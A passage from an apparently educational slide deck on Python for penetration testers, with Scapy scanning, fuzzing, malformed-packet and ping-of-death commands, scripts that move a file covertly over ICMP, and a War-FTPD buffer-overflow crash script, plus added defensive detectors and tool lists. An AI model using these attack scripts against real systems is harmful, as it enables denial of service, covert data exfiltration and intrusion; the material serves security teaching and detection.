    • sendp(rdpcap("/tmp/pcapfile"))
  • 34. Scapy
• 35. Scapy
    sendp("I'm travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
• 36. Scapy
    Send and receive packets
    • p=sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX")
    • p=sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
    • p.show()
• 37. Scapy
    Send and receive packets
    • p=sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
• 38. Scapy
    Send and receive packets
    • sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]))
    • sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)
• 39. Scapy
    Fuzzing
    • send(IP(dst="192.168.1.10")/fuzz(ICMP()/NTP(version=4)),loop=1)
    • send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)),loop=1)
• 40. Scapy
    TCP traceroute
    • res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com"],dport=[80,443],maxttl=20,retry=-2)
  • 41. Scapy
• 42. Scapy
    Sniffing
    • sniff(filter="icmp and host 66.35.250.151", count=2)
    • a=_
    • a.nsummary()
    • a[1]
    • sniff(iface="eth0", prn=lambda x: x.show())
  • 43. Scapy
• 44. Scapy
    SYN scan
    • sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S"))
    • sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S"))
    • ans,unans = sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S"))
    • ans.summary()
    • ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )
• 45. Scapy
    Classic attacks
    • Malformed packets
        send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
    • Ping of death
        send( fragment(IP(dst="192.168.1.10")/ICMP()/("X" * 60000)) )
• 46. Scapy
    • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
    • send( fragment(IP(dst="192.168.1.10")/ICMP()/("X" * 60000)) )
  • 47. Scapy
• 48. Scapy
    To send packets via ICMP
        #!/usr/bin/python
        import sys
        from scapy.all import *

        conf.verb = 0
        f = open(sys.argv[1])
        data = f.read()
        f.close()
        host = sys.argv[2]
        print "Data size is %d " %len(data)
        i=0
        while i<len(data):
            pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32]
            send(pack)
            i = i+32
        print "Data sent"
• 49. Scapy
    To receive packets via ICMP
        #!/usr/bin/python
        import sys
        from scapy.all import *

        conf.verb=0
        f=open(sys.argv[1],"w")
        host=sys.argv[2]
        count = int(sys.argv[3])
        filter="icmp and host " + host
        print "sniffing with filter (%s) for %d bytes" % (filter,int(count))
        packets = sniff(count,filter=filter)
        for p in packets:
            f.write(p['Raw'].load)
        f.close()
        print "Data received"
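The two scripts on slides 48 and 49 move a file through ICMP by sending echo-reply packets that no host ever requested. That is also what makes the channel visible to a defender: a monitor that pairs each echo-reply with the echo-request it answers will find these replies have no partner. The following is an added example (not the deck's code, and independent of Scapy) of that check; the packets are constructed in pure Python with struct, the addresses are made up, and the IP and ICMP checksums are left at zero, which the detector does not inspect.

```python
"""Added example, not the deck's code: flagging unsolicited ICMP echo-replies,
the wire pattern produced by the deck's ICMP file-transfer scripts."""
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def build_ipv4_icmp(src, dst, icmp_type, ident, seq, payload):
    """IPv4 header (no options, checksum 0) + ICMP echo header + payload."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + icmp


def parse_ipv4_icmp(packet):
    """Return (src, dst, icmp_type, ident, seq, payload); honours the IHL field."""
    ihl = (packet[0] & 0x0F) * 4
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    return src, dst, icmp_type, ident, seq, packet[ihl + 8:]


def detect_unsolicited_replies(packets, min_packets=3):
    """Pair each echo-reply with an earlier echo-request (reply src/dst are the
    request's dst/src, same id and seq). Replies with no partner are counted
    per sending host; hosts at or above min_packets are reported with the
    number of packets and payload bytes they pushed."""
    outstanding = set()
    unsolicited = {}
    for pkt in packets:
        src, dst, icmp_type, ident, seq, payload = parse_ipv4_icmp(pkt)
        if icmp_type == ICMP_ECHO_REQUEST:
            outstanding.add((dst, src, ident, seq))
        elif icmp_type == ICMP_ECHO_REPLY:
            key = (src, dst, ident, seq)
            if key in outstanding:
                outstanding.discard(key)
            else:
                count, size = unsolicited.get(src, (0, 0))
                unsolicited[src] = (count + 1, size + len(payload))
    return {host: {"packets": c, "bytes": b}
            for host, (c, b) in unsolicited.items() if c >= min_packets}


def constructed_capture():
    """Constructed traffic: two normal ping round-trips, then a sender like the
    deck's script pushing a 120-byte file from 10.0.0.9 in 32-byte echo-reply
    slices (Scapy's ICMP() defaults give every slice id=0, seq=0)."""
    packets = []
    for seq in (1, 2):
        packets.append(build_ipv4_icmp("10.0.0.5", "10.0.0.1", ICMP_ECHO_REQUEST, 0x1234, seq, b"\x00" * 56))
        packets.append(build_ipv4_icmp("10.0.0.1", "10.0.0.5", ICMP_ECHO_REPLY, 0x1234, seq, b"\x00" * 56))
    file_data = b"constructed sample data " * 5
    for i in range(0, len(file_data), 32):
        packets.append(build_ipv4_icmp("10.0.0.9", "10.0.0.1", ICMP_ECHO_REPLY, 0, 0, file_data[i:i + 32]))
    return packets


if __name__ == "__main__":
    print(detect_unsolicited_replies(constructed_capture()))
```

On real traffic the same logic runs over the IP payloads of a pcap; the ordinary pings cancel out and only the sender of the unrequested replies is reported, together with how much data it moved.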
• 50. Python's uses – Debugging and Reverse Engineering
    • Immunity Debugger: scriptable GUI and command line debugger
    • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
    • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
    • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
    • pefile: read and work with Portable Executable (aka PE) files
    • pydasm: Python interface to the libdasm x86 disassembling library
    • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
    • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
    • diStorm64: disassembler library for AMD64, licensed under the BSD license
    • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
    • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it (mirror)
    • Androguard: reverse engineering and analysis of Android applications
    http://www.dirk-loss.de/python-tools.htm
  • 51. Coding for Pentesters - Exploitation scripting
• 52. Coding for Pentesters – Exploitation scripting
    Building Exploits with Python
    1. Windows XP SP0
    2. War-FTPD v 1.65
    3. Immunity Debugger
  • 53. Coding for Pentesters – Exploitation scripting Step 1 – Open WarftpD with Immunity
  • 54. Coding for Pentesters – Exploitation scripting Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.
• 55. Coding for Pentesters – Exploitation scripting
    Step 3 – Build this script and run it…. and enjoy the show
        #!/usr/bin/python
        import sys
        import socket

        hostname = sys.argv[1]
        username = "A"*1024
        passwd = "anything"

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((hostname, 21))
        except:
            print ("[-] Connection error!")
            sys.exit(1)

        r = sock.recv(1024)
        print "[+] " + r
        sock.send("user %s\r\n" %username)
        r = sock.recv(1024)
        print "[+] " + r
        sock.send("pass %s\r\n" %passwd)
        r = sock.recv(1024)
        print "[+] " + r
        sock.close()
• 56. Coding for Pentesters – Exploitation scripting
    The connection attempt with the user name of AAAA…AAAA (the 1024 "A" characters the script sends)
  • 57. Coding for Pentesters – Exploitation scripting
  • 58. Coding for Pentesters – Exploitation scripting Step 4 - WarFTPD crashes!
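What crashes War-FTPD in the steps above is an FTP USER command whose argument is 1024 bytes long, far beyond any real account name. As an added example (not the deck's code), here is the corresponding detection check a defender can run over FTP control-channel log lines: it flags watched commands whose argument exceeds a length limit and notes when the argument is a single repeated byte. The log line format (timestamp, client address, command, argument) and the sample lines are constructed for this example; the limit of 128 is an assumption to tune per environment.

```python
"""Added example, not the deck's code: flag oversized FTP command arguments
in control-channel logs (constructed line format: '<ts> <client> <CMD> [arg]')."""
import re

# RFC 959 commands that carry a free-form argument and are common overflow targets.
WATCHED = ("USER", "PASS", "CWD", "RETR", "STOR", "MKD", "DELE")
MAX_ARG_LEN = 128   # assumption: well above legitimate username/path lengths here

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$")


def check_line(line, max_arg_len=MAX_ARG_LEN):
    """Return an alert dict for an oversized argument, or None for a normal line."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None                      # not in the expected format; skip
    cmd = m.group("cmd").upper()
    arg = m.group("arg") or ""
    if cmd in WATCHED and len(arg) > max_arg_len:
        return {
            "ts": m.group("ts"),
            "client": m.group("client"),
            "command": cmd,
            "arg_len": len(arg),
            "repeated_byte": len(set(arg)) == 1,   # classic filler pattern like "A"*1024
        }
    return None


def scan(lines, max_arg_len=MAX_ARG_LEN):
    """Run check_line over an iterable of log lines and collect the alerts."""
    return [alert for alert in (check_line(l, max_arg_len) for l in lines) if alert]


# Constructed log lines: one ordinary login session and one oversized USER command.
CONSTRUCTED_LOG = [
    "2012-06-02T10:00:01 192.0.2.10 USER keith",
    "2012-06-02T10:00:01 192.0.2.10 PASS hunter2",
    "2012-06-02T10:00:02 192.0.2.10 CWD /pub",
    "2012-06-02T10:00:09 192.0.2.77 USER " + "A" * 1024,
    "2012-06-02T10:00:09 192.0.2.77 PASS anything",
]


if __name__ == "__main__":
    for alert in scan(CONSTRUCTED_LOG):
        print(alert)
```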
• 59. Python's uses – Malware analysis
    • torwget.py: Multi-platform TOR-enabled URL
    • clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules
    • peid_to_yara.py: Convert PEiD packer signatures to YARA rules
    • av_multiscan.py: Script to implement your own antivirus multi-scanner
    • pescanner.py: Detect malicious PE file attributes
    • ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep
    • avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks
    • dbmgr.py: Malware artifacts database manager
    • artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware
    • mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP
    • googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts
    • sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask
    • vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests
    • mybox.py: Sample automation script for VirtualBox based on vmauto.py
• 60. Python's uses – Malware analysis
    • myvmware.py: Sample automation script for VMware based on vmauto.py
    • analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory
    • scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files
    • findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks
    • pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report
    • xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation
    • trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor
    • kraken.py: Immunity Debugger PyCommand for cracking Kraken's Domain Generation Algorithm (DGA)
    • sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings
    • install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service
    • dll2exe.py: Python script for converting a DLL into a standalone executable
    • windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA
  • 61. Python’s uses – Malware analysis Practical Malware Analysis • FakeNet - http://practicalmalwareanalysis.com/
• 62. Python's uses – Malware analysis
    • Cuckoo Sandbox - a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.
    • yara-python: identify and classify malware samples
    • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
    • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
    • pyClamAV: add virus detection capabilities to your Python software
    • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
    • phoneyc: pure Python honeyclient implementation
    http://www.dirk-loss.de/python-tools.htm
• 63. Python's uses – Fuzzing
    • Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up, including some tshark support and other features.
    • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
    • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
    • antiparser: fuzz testing and fault injection API
    • TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
    • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
    • FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
    • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
    • Fuzzbox: multi-codec media fuzzer
    • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
    • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
    • WSBang: perform automated security testing of SOAP based web services
    • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
    • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
    • Fusil: Python library used to write fuzzing programs
    http://www.dirk-loss.de/python-tools.htm
  • 64. Python’s uses – Fuzzing Sickfuzz
• 65. Python's uses – Web
    • Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing.
    • ProxMon: processes proxy logs and reports discovered issues
    • Twill: browse the Web from a command-line interface. Supports automated Web testing
    • Windmill: web testing tool designed to let you painlessly automate and debug your web application
    • FunkLoad: functional and load web tester
    • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
    • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
    http://www.dirk-loss.de/python-tools.htm
  • 66. Python’s uses – Web http://snippets.scrapy.org/snippets/7/
• 67. Python's uses – Forensics
    • Volatility: extract digital artifacts from volatile memory (RAM) samples
    • SandMan: read the hibernation file, regardless of Windows version
    • LibForensics: library for developing digital forensics applications
    • TrIDLib: identify file types from their binary signatures. Now includes Python binding
    • aft: Android forensic toolkit
    http://www.dirk-loss.de/python-tools.htm
  • 68. Python’s uses – Forensics Volatility
• 69. Python's uses – Miscellaneous
    • InlineEgg: toolbox of classes for writing small assembly programs in Python
    • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
    • RevHosts: enumerate virtual hosts for a given IP address
    • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
    • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?)
    • Hachoir: view and edit a binary stream field by field
    Other useful libraries and tools
    • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
    • Beautiful Soup: HTML parser optimized for screen-scraping
    • Mayavi: 3D scientific data visualization and plotting
    • Twisted: event-driven networking engine
    • Suds: lightweight SOAP client for consuming Web Services
    • M2Crypto: most complete OpenSSL wrapper
    • NetworkX: graph library (edges, nodes)
    • pyparsing: general parsing module
    • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
    • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
    • Pexpect: control and automate other programs, similar to Don Libes' `Expect` system
    • Sikuli: visual technology to search and automate GUIs using screenshots. Scriptable in Jython
    • PyQt and PySide: Python bindings for the Qt application framework and GUI library
    http://www.dirk-loss.de/python-tools.htm
• 70. Coding for Penetration Testers book
    Script / Function / Learned
    Webcheck_v1.py
        Function: Monitor web server – verify it remains up
        Learned: 1. Script arguments  2. Connect to web server and run a GET request
    Webcheck_v2.py
        Function: Monitor web server – verify it remains up (default to port 80)
        Learned: 1. Alternate script arguments method
    Subnetcalc.py
        Function: Calculate subnet mask, broadcast address, network range, and gateway from IP/CIDR
        Learned: 1. Parse out values programmatically  2. Math functions with variables  3. Displaying results  4. Using FOR loops
    Pass.py
        Function: Determines if users are using the original default assigned password
        Learned: 1. Use the crypt module
    Robotparser.py
        Function: Retrieve the paths from the robot.txt
        Learned: 1. Parse the robots.txt file with the built-in robotparser module  2. Nesting FOR loops
    root_check.py
        Function: Checks to see what permissions the logged in account has (normal user, root or system account)
        Learned: 1. Using IF and ELIF conditional statements  2. Use OS module to make system calls
    Readshadow.py
        Function: Checks to see if you have permission to read /etc/shadow
        Learned: 1. Use OS module to make system calls  2. Tests permissions on files to see if current credentials can read file
    Network_socket.py
        Function: Connect to website, pull contents (hard coded)
        Learned: 1. Network socket creation  2. Spaces will bite you in the ass where you least expect it.
• 71. Coding for Penetration Testers book
    Script / Function / Learned
    network_socket_argument.py
        Function: Connect to website, pull contents (site specified by argument)
        Learned: 1. Network socket creation  2. Spaces will bite you in the ass where you least expect it.
    Server_connect.py
        Function: Once a connection is made, send back a string
        Learned: 1. Network socket creation  2. Allow incoming connections.
    receiveICMP.py
        Function: To receive a file from another system via ICMP (in conjunction with sendICMP.py)
        Learned: 1. Python script using Scapy
    sendICMP.py
        Function: To send a file to another system via ICMP (in conjunction with receiveICMP.py)
        Learned: 1. Python script using Scapy
• 72. Little gems I found
    Description / Function / Site
    Python-nmap
        Function: It's a Python library which helps in using nmap.
        Site: http://xael.org/norman/python/python-nmap/
    Python API to the VirtualBox VM
        Function: Allowing you to control every aspect of virtual machine configuration and execution
        Site: http://download.virtualbox.org/virtualbox/SDKRef.pdf
    Py2Exe
        Function: py2exe is a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation.
        Site: http://www.py2exe.org/
    Chrome extensions/applications
        Function: Various extensions/applications found in the Chrome Webstore
        Site:
        • https://chrome.google.com/webstore/detail/gdiimmpmdoofmahingpgabiikimjgcia <-- Python shell (browser button)
        • https://chrome.google.com/webstore/detail/cmlchnlmkdcpelgmkebknjgjgddncelc <-- Python shell (Chrome application)
        • https://chrome.google.com/webstore/detail/nckbgikkpbjdliigbhgjfgfcahhonakp <-- Online Python development environment
• 73. Little gems I found
    Extra extra credit
    Description / Function / Site
    Tweepy
        Function: It's the best working Python library to interface with Twitter (so far)
        Site: http://tweepy.github.com/
• 74. Tweepy
    • Direct message
    • Check friends timelines
    • Create favorites
    http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
• 75. Tips, tricks, etc.
    IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)
    • Windows
        • PyScripter
        • Aptana Studio
        • IDLE
        • Ninja
        • Wing IDE
    • Linux
        • IDLE
        • Geany
        • Python Toolkit
        • SPE
        • ERIC (supposed to have auto-complete of code…)
    Editors (http://wiki.python.org/moin/PythonEditors)
    • Windows
        • Notepad++
    • Linux
        • Gedit
        • SCiTE
• 76. Tips, tricks, etc.
    Shells
    • DreamPie
        • Automatic completion of attributes and file names
        • History box
        • Code box
    • IDLE
        • Included with Python install
    • Ipython
    • PyShell
    • Guake
    Other
    • PythonAnywhere
        • http://pythonanywhere.com/
• 77. Tips, tricks, etc.
    Linux vs. Windows
    Linux
    • Linux scripts can be run via terminal
        • calling python <script name>
        • by putting #!/usr/bin/python at the top (path to interpreter) and typing ./<script name>
    • Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #!/usr/bin/python
    Windows
    • Windows scripts don't need the #! but need to have .py associated with the Python interpreter.
    • Scripts can be double clicked or run from command prompt: python <script name>
    • If the script is double clicked without having raw_input("Press ENTER to exit") you may not see the output of the script.
• 78. Tips, tricks, etc.
    Portable Python (Windows only)
    • Portable Python is a Python® programming language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application.
    • Portable Python 2.7.2.1 package contains the following applications/libraries:
        • PyScripter v2.4.1
        • NumPy 1.6.0
        • SciPy 0.90
        • Matplotlib 1.0.1
        • PyWin32 216
        • Django 1.3
        • PIL 1.1.7
        • Py2Exe 0.6.9
        • wxPython 2.8.12.0
    • Portable Python 3.2.1.1 package contains the following applications/libraries (alphabetical order):
        • NetworkX v1.4
        • PySerial 2.5
        • PyScripter v2.4.1
        • PyWin32 v.216
        • RPyC-3.0.7
• 80. Additional resources
    Beginners guides from Python
    • http://wiki.python.org/moin/BeginnersGuide/NonProgrammers
    • http://wiki.python.org/moin/BeginnersGuide/Programmers
    Extra tools
    • http://mashable.com/2007/10/02/python-toolbox/
    Online exercises
    • http://codingbat.com/python
    • http://homepage.mac.com/s_lott/books/python.html
    • http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html
    • http://anh.cs.luc.edu/python/hands-on/
    • http://code.google.com/edu/languages/google-python-class/index.html
    • http://www.cdf.toronto.edu/~csc148h/winter/
    • http://www.cdf.toronto.edu/~csc108h/fall/
    • http://projecteuler.net/
    • http://www.upriss.org.uk/python/PythonCourse.html
    • http://www.pythonchallenge.com/
    • http://learnpythonthehardway.org/
    • http://www.awaretek.com/tutorials.html
    • http://www.checkio.org/
    • http://www.pyschools.com/
    General learning materials
    • http://www.py4inf.com/
• 81. Additional resources
    Free online videos
    • http://freevideolectures.com/Course/2512/Python-Programming
    • http://showmedo.com/videotutorials/python
    • http://www.python.org/doc/av/
    • http://thenewboston.org/list.php?cat=36
    Online books
    • http://en.wikibooks.org/wiki/Python_Programming
    Online interactive tutorial/interpreter
    • http://www.trypython.org
    • http://www.learnpython.org/
    • https://languageshells.appspot.com/
    Forums
    • http://www.python-forum.org
    • http://stackoverflow.com/questions/tagged/python
    • http://www.daniweb.com/software-development/python/114
    Module/package repositories
    • http://pypi.python.org/pypi – The Python Package Index is a repository of software for the Python programming language. There are currently 17409 packages here.
    • http://code.activestate.com/recipes/ – The ActiveState Code Recipes contains 3850 snippets to learn from and use.
    Python tools for penetration testers
    • http://www.dirk-loss.de/python-tools.htm
• 82. Additional resources
    Training
    • SecurityTube Python Scripting Expert
        http://securitytube-training.com/certifications/securitytube-python-scripting-expert/?id=main
        • Module 1: Python Scripting – Language Essentials
        • Module 2: System Programming and Security
        • Module 3: Network Security Programming – Sniffers and Packet Injectors
        • Module 4: Attacking Web Applications
        • Module 5: Exploitation Techniques
        • Module 6: Malware Analysis and Reverse Engineering
        • Module 7: Attack Task Automation
        • Module 8: Further Study and Roadmap
        • Module 9: Exam Pattern and Mock Exam
    • PYTHON TRAINING FOR SECURITY PROFESSIONALS
        http://www.trainace.com/courses/python/
        • Log Parsing with Python
        • Pcap Parsing with Python
        • Network Attack with Python
        • Web Application Attack with Python
        • Malware Analysis with Python
        • Exploit Development with Python
• 83. All the scripts
    Category / Script
    • CSAW Crypto Redux – Challenge 1 to 5
    • Extra credit
    • Coding for Penetration Testers – part 1
    • Coding for Penetration Testers – part 2
    • Coding for Penetration Testers – part 3
    • Extra extra credit
• 84. Etc.
    Antigravity
    • When you open up Module Docs and click on the antigravity module, or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck.
    Zen of Python
    • To start the path of finding the Zen of Python, remember these two key words… IMPORT THIS.
    • From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed.
  • 85. Etc.
• 87. Questions?
    Keith Dixon
    @Tazdrumm3r
    #misec – Tazdrumm3r
    tazdrummer@gmail.com
    http://tazdrumm3r.wordpress.com